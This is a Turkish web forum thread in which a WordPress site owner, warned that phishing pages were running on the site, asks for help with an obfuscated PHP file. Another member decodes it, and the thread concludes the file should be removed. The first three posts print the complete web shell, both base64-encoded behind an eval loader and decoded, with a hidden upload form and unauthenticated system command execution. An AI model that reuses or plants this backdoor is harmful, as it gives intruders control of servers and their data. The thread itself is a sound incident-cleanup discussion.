• 18-05-2013, 13:21:45
    #1
    Hostingimden aşağıdaki maili aldım.
    Telefon açtım öğrendiğim kadarı ile sitem üzerinden sahtekarlık dolandırıcılık saldırısı yapılıyormuş. Sitem wordpress son zamanlarda sadece yaptığım şey temayı değiştirmek oldu ve sanırım temada açık bırakılmış. Temayı wp den indirmemiştim büyük hata.

    Şimdi bahsedilen dosyaları sildim
    Sonra worpdresi yeniden güncelledim.
    Ftp yi indirip virüs taraması yaptım.
    O malum temayı sildim.

    Bundan sonra ne yapmamı öneririsiniz ?

    Our company investigates computer crime incidents on behalf of banks and other companies.
    
    A phishing site was found to be operating on your network and targeting Wells Fargo Online Banking customers:
    
    
    ip.xxx.190.213 - 213vd8gug.ni.net.tr
    
    hXXp://www. s i t e m .com/wp-includes/pomo/wellsfargo-online.php
    hXXp://www. s i t e m .com/wp-includes/pomo/verification.php
    
    
    If possible, please provide the following information to assist our investigation:
    
    - Web server and FTP server log files for the past several days
    - Copies of all phishing files, hack tools, or other hacker files
    
    Finally, we kindly request that you disable or remove the phishing files as soon as possible.
    
    If we have contacted you in error, or there is a better way for us to report this incident, please let us know.
    
    Thank you for your assistance,
    
    Walker Steele
    PhishLabs Security Operations
    soc@phishlabs.com
    +1.202.386.6001
    http://www.phishlabs.com/
    Edit: Wordfence eklentisini kurdum ve şunu yakaladı !!! BAse64 çözebilen varsa bakabilrimi nedir ?

    <?php
    $jembot = 'aWYoaXNzZXQoJF9HRVRbJ2plbWJvdCddKSkNCnsNCmVjaG8gIjxib2R5IGJnY29sb3I9YmxhY2s+DQo8Zm9udCBjb2xvcj1jeWFuIHNpemU9Mz4iOw0KZWNobyAiPGgyPmVtcGl4Y3JldyB0ZWNobm9sb2d5PC9oMj48aHI+IjsNCiAgICBlY2hvICI8Zm9ybSBhY3Rpb249XCJcIiBtZXRob2Q9XCJwb3N0XCIgZW5jdHlwZT1cIm11bHRpcGFydC9mb3JtLWRhdGFcIj4NCjxsYWJlbCBmb3I9XCJmaWxlXCI+ZW1waXg6PC9sYWJlbD4NCjxpbnB1dCB0eXBlPVwiZmlsZVwiIG5hbWU9XCJmaWxlXCIgaWQ9XCJmaWxlXCIgLz4NCjxiciAvPg0KPGlucHV0IHR5cGU9XCJzdWJtaXRcIiBuYW1lPVwic3VibWl0XCIgdmFsdWU9XCJ1cGxvZFwiPg0KPC9mb3JtPiI7DQppZiAoJF9GSUxFU1siZmlsZSJdWyJlcnJvciJdID4gMCkNCiAgew0KICBlY2hvICJnYWdhbDogIiAuICRfRklMRVNbImZpbGUiXVsiZXJyb3IiXSAuICI8YnIgLz4iOw0KICB9DQplbHNlDQogIHsNCiAgZWNobyAic3Vrc2VzOiAiIC4gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl0gLiAiPGJyIC8+IjsNCiAgZWNobyAidWt1cmFuOiAiIC4gKCRfRklMRVNbImZpbGUiXVsic2l6ZSJdIC8gMTAyNCkgLiAiIEtiPGJyIC8+IjsNCiAgZWNobyAibWVudGFoOiAiIC4gJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdOw0KICB9DQppZiAoZmlsZV9leGlzdHMoIiIgLiAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSkpDQogICAgICB7DQogICAgICBlY2hvICRfRklMRVNbImZpbGUiXVsibmFtZSJdIC4gIiB3ZXMgZW5layBjb2suICI7DQogICAgICB9DQogICAgZWxzZQ0KICAgICAgew0KICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwNCiAgICAgICIiIC4gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl0pOw0KICAgICAgZWNobyAiIG1hdGVuZzogIiAuICIiIC4gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl07DQplY2hvIjxocj4iOw0KICAgICAgfQ0KICB9DQplbHNlaWYgKCRfR0VUWyJlbXBpeCJdKXsNCglzeXN0ZW0oJF9HRVRbImVtcGl4Il0pOyANCn0NCmVsc2Ugew0KJHVuID0gcGhwX3VuYW1lKCk7DQplY2hvICJlbXBpeGNyZXc6ICR1biA6ZW1waXhjcmV3IjsNCn0=';
    eval(base64_decode($jembot));
    ?>
  • 18-05-2013, 13:53:44
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Verdiğiniz base64 ile şifrelenmiş kodun çözümlenmiş hali

    if(isset($_GET['jembot']))
    {
    echo "<body bgcolor=black>
    <font color=cyan size=3>";
    echo "<h2>empixcrew technology</h2><hr>";
        echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
    <label for=\"file\">empix:</label>
    <input type=\"file\" name=\"file\" id=\"file\" />
    <br />
    <input type=\"submit\" name=\"submit\" value=\"uplod\">
    </form>";
    if ($_FILES["file"]["error"] > 0)
      {
      echo "gagal: " . $_FILES["file"]["error"] . "<br />";
      }
    else
      {
      echo "sukses: " . $_FILES["file"]["name"] . "<br />";
      echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
      echo "mentah: " . $_FILES["file"]["tmp_name"];
      }
    if (file_exists("" . $_FILES["file"]["name"]))
          {
          echo $_FILES["file"]["name"] . " wes enek cok. ";
          }
        else
          {
          move_uploaded_file($_FILES["file"]["tmp_name"],
          "" . $_FILES["file"]["name"]);
          echo " mateng: " . "" . $_FILES["file"]["name"];
    echo"<hr>";
          }
      }
    elseif ($_GET["empix"]){
    	system($_GET["empix"]); 
    }
    else {
    $un = php_uname();
    echo "empixcrew: $un :empixcrew";
    }
  • 18-05-2013, 13:58:40
    #3
    saintx adlı üyeden alıntı: mesajı görüntüle
    Verdiğiniz base64 ile şifrelenmiş kodun çözümlenmiş hali

    if(isset($_GET['jembot']))
    {
    echo "<body bgcolor=black>
    <font color=cyan size=3>";
    echo "<h2>empixcrew technology</h2><hr>";
        echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
    <label for=\"file\">empix:</label>
    <input type=\"file\" name=\"file\" id=\"file\" />
    <br />
    <input type=\"submit\" name=\"submit\" value=\"uplod\">
    </form>";
    if ($_FILES["file"]["error"] > 0)
      {
      echo "gagal: " . $_FILES["file"]["error"] . "<br />";
      }
    else
      {
      echo "sukses: " . $_FILES["file"]["name"] . "<br />";
      echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
      echo "mentah: " . $_FILES["file"]["tmp_name"];
      }
    if (file_exists("" . $_FILES["file"]["name"]))
          {
          echo $_FILES["file"]["name"] . " wes enek cok. ";
          }
        else
          {
          move_uploaded_file($_FILES["file"]["tmp_name"],
          "" . $_FILES["file"]["name"]);
          echo " mateng: " . "" . $_FILES["file"]["name"];
    echo"<hr>";
          }
      }
    elseif ($_GET["empix"]){
    	system($_GET["empix"]); 
    }
    else {
    $un = php_uname();
    echo "empixcrew: $un :empixcrew";
    }
    Sevgili saint cevabınız için teşekkür ederim.
    Php dilini bilmiyorum Bu kodlar acaba zararlımıdır ?
    Neticede ben eklemeden ftp me girmiş bi şekilde.
  • 18-05-2013, 15:22:27
    #4
    senturksun adlı üyeden alıntı: mesajı görüntüle
    Sevgili saint cevabınız için teşekkür ederim.
    Php dilini bilmiyorum Bu kodlar acaba zararlımıdır ?
    Neticede ben eklemeden ftp me girmiş bi şekilde.
    Bu kodlar ile dosya yükleme işlemi yapma yetkisine sahip oluyor. Zararlı olduğu kesin gözüküyor. Kaldırmanızı tavsiye ederim.
  • 18-05-2013, 16:34:53
    #5
    Sağolun hocam kaldırdım.
    Umarım birdaha olmaz. Bu açığı sağlayan dosyada sanırım tema ile geldi çünki diğer tüm eklentiler wp org dan eklenmişti.

    saygılarımla.